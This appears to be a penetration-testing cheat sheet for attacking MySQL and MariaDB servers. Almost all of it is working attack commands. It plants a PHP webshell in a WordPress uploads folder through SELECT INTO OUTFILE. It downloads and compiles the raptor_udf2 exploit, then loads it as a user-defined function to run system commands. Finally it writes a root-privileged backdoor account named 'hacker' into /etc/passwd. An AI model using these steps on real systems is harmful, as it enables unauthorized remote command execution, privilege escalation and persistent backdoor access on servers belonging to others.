tcp/3306 mysql

  • write webshell to filesystem
> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";

MariaDB

> wget https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c
> gcc -g -c raptor_udf2.c
> gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
> mysql -u root -p
  • Exploit steps
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));

# Look up the value of plugin_dir and use that directory as the dump file location
mysql> show variables like '%plugin%';

mysql> select * from foo into dumpfile "<select-a-path-from-above>/raptor_udf2.so";
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;

# Sometimes this fails with an error saying the file is too short; try compiling the .so in a different folder

# create a user hacker:pass123
mysql> select do_system('echo \'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash\' >> /etc/passwd');